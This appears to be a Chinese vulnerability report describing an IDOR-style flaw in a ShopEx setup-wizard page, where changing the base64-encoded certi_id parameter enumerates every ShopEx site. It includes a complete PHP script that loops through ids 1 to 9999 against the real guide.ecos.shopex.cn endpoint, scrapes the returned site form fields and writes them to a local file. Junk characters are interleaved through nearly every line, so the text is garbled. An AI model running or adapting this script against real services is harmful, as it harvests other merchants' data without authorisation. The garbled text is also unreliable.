|
简要描述:
$ _# [: b0 Y. B C( VShopEx某接口缺陷,可遍历所有网站
5 R* ~3 @. _3 s5 M! g详细说明:
+ q" a9 x$ M, ?" {问题出现在shopex 网店使用向导页面 ! ^* l; p, \& l
5 B- M/ `% R; s! D4 n% z/ E* {
0 C3 I; y/ `& `6 V3 L2 t7 d* U
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=4 B6 ?' J7 K- `
; O( @- @( }+ z. n( Z4 V5 n- B$ ~* b& Y5 g( x- |
+ t, S1 Z( P2 Z7 @
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
Z7 R4 P2 C; j
P7 Y) h% |8 z& I' o2 c- q1 }7 @0 s# C! g% V9 x
2 W& R; Y' k* Q$ N9 {; V L我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
5 J2 Q& w/ ^. j8 R$ A( N. H G" m$ m. b
# X% _* h9 F. P- B' ~9 M# ?% p: d
+ Z( ^4 Y( @. m: D8 M% q
<?php
! t" s& b/ X8 M6 X" z; B0 K* D$ S0 @+ A* }. E
for ($i=1; $i < 10000; $i++) { //遍历7 i0 w0 Q) e- r" B* l1 c# c
3 B0 |1 Q& \# n, q6 ~" T; c
ShowshopExD($i);
- @* J) p3 V1 ]3 C; P M( K/ x( i. D5 n1 ]& g; G6 ]
}
5 t0 c. G& X1 ]! h: b+ G* L. J+ l6 s
function ShowshopExD($cid) {, {& w9 A2 w; Z# `: d: M/ W* j9 M
. Q: d% Q, i3 w. A! M' O- v! n, Y
$url='http://guide.ecos.shopex.cn/step2.php';" b0 k$ f, t, X6 b
: X- y, D" r- z' j $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');9 h0 b) G0 Q) }2 j0 \# E
& K: ?' t3 A# M k' z3 V
$url = $url.'?refer='.$refer;
( {% e% t# ?/ d9 ~ x
% h! z/ J) p7 B6 W! n+ u9 d $ch = curl_init($url);
+ `9 k$ O* z- G9 s/ }3 l b5 D% l* V5 F, u& ~& s* }3 b4 Z
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
9 N9 L, B' m0 `3 Y2 t$ y/ h1 b- H! y q, ]. ]! t+ B$ ~
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
f% s6 V m7 w% { L" B8 Y8 C) d
8 J; j" \ A& P m5 X/ O' A5 m $result = curl_exec($ch);& G/ J% c) E2 E; Z( q
- d0 ] t9 B0 A. {1 }
$result = mb_convert_encoding($result, "gb2312", "UTF-8");+ B4 G4 M# [ w$ q" [
6 H, n8 m+ G1 [* y! o8 K5 ~
if(strpos($result,$refer))
# U. _" f; ?: ?8 ~ {* G5 \5 K& x! A5 H! Z* V/ U2 X1 H# d
{
8 o* j7 y5 v2 T( p4 b, r# V- {; S. z$ ^ y3 a# s
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件
- Z& \) S1 D" U+ g6 \
( w* C- a0 I4 B: b) o- q preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);+ J% V1 g6 w5 ?/ r) D
. C4 x7 {3 _8 g2 Q x& B2 u7 v
foreach ($value[1] as $key) {
6 s( M2 ^) R$ \4 D# E0 x$ v2 H& Q2 k4 S e1 H4 E2 E
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);3 N. ~/ L5 W' r- e$ w
, p0 \/ N- ]% W, W$ \& o% D
echo $res[1][0].':'.$res[3][0]."\r\n";
3 ^8 }/ w; a/ m& G# v& g8 I \& e7 W& I, p& V a4 j! R* C
$col =$res[1][0].':'.$res[3][0]."\r\n";
6 s; E3 P( U8 b, S: v8 m5 b2 M) G
; J7 v7 l+ y# P: H! l fwrite($fp, $col, strlen($col));
- h7 C& l9 ]8 J. J* O9 S2 u1 ?4 X. {( O7 s( i
}: K2 v) E. Y5 B0 T7 J6 x
3 _) F e5 B% Y% g5 S; C echo '--------------------------------'."\r\n";3 ^+ W1 {! @4 o# K g
- i# d' r) N) p5 G0 N
fclose($fp); 7 g H# a) ~6 T7 q+ H
( X W+ ~& X! {, C. o! D1 x* f }. i6 u: h b( L9 F. m; ]0 J T9 g( ?
9 C$ g1 i, o, I. i. ~+ }! U
flush();
) c' ?. b- a" I, O+ o
' p* V1 K8 Y. B curl_close($ch);8 z* t3 ~- i" F0 Z% o( a& h
, j; u. a% Z/ J0 f9 m% i8 t7 C }
4 y8 I7 @# A' G" J& d( p8 k+ G
8 x; G d z" |, l?>* z# v$ r' S, t7 z7 {' H9 @. a
漏洞证明:
' {. B. X A2 {& B/ H# p1 }http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
6 S% L s8 w; v$ |. Wrefer换成其他加密方式
5 j$ h9 c* _. p |
|